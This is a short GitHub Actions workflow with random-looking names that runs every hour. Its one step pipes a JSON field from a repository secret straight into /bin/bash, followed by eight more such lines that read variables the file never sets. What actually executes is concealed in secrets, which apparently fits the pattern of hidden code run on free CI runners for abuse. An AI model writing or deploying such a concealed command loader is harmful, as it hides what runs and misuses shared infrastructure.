name: fukangan6371

on:
  workflow_dispatch:
  schedule:
    - cron: '34 * * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fukangan6371
        env:
          ytm33208: ${{ secrets.ytm33208 }}
        run: |
          echo $ytm33208 | jq -r .csh5098 | /bin/bash
          echo $pxj769 | jq -r .x605 | /bin/bash
          echo $eew0974 | jq -r .vdizh744 | /bin/bash
          echo $ud1033 | jq -r .yfdwd6625 | /bin/bash
          echo $fetpw26352 | jq -r .pzmmv9977 | /bin/bash
          echo $bgfim27 | jq -r .jv9 | /bin/bash
          echo $bng6165 | jq -r .yggtu15241 | /bin/bash
          echo $ar7872 | jq -r .slhf80 | /bin/bash
          echo $xhr01140 | jq -r .tbqcw386 | /bin/bash

